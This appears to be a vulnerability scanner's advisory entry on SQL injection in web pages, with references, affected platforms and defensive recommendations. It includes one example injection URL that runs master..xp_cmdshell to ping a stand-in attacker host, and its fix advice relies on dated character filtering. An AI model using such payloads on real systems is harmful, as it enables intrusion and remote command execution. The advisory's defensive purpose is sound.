| VID |
22052 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
The specified web page of the web server is vulnerable to SQL injection attacks. The web page do not properly validate user input before passing it to an SQL query. Therefore, an attacker could create their own SQL commands and submit them to the database connected to the web server through these input fields, giving them the ability to read, modify, create and delete database entries.
Being able to inject SQL command usually mean, an attacker can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. The attacker can use stored procedures like master..xp_cmdshell to perform remote execution:
http://[www.target.com]/vulnerable.asp?id=10'; exec master..xp_cmdshell 'ping www.attacker.com'--
* References:
http://www.unixwiz.net/techtips/sql-injection.html
http://www.tech-faq.com/sql-injection-attack.shtml
http://www.cgisecurity.com/development/sql.shtml
http://www.securitydocs.com/library/2656
http://www.securitydocs.com/library/3348
http://www.securitydocs.com/library/3587
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.iss.net/security_center/static/8783.php
http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
* Platforms Affected:
Any HTTP server Any version
Any operating system Any version |
| Recommendation |
o Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
o For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
o Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
o Delete stored procedures that you are not using like:
master..sp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask |
| Related URL |
(CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
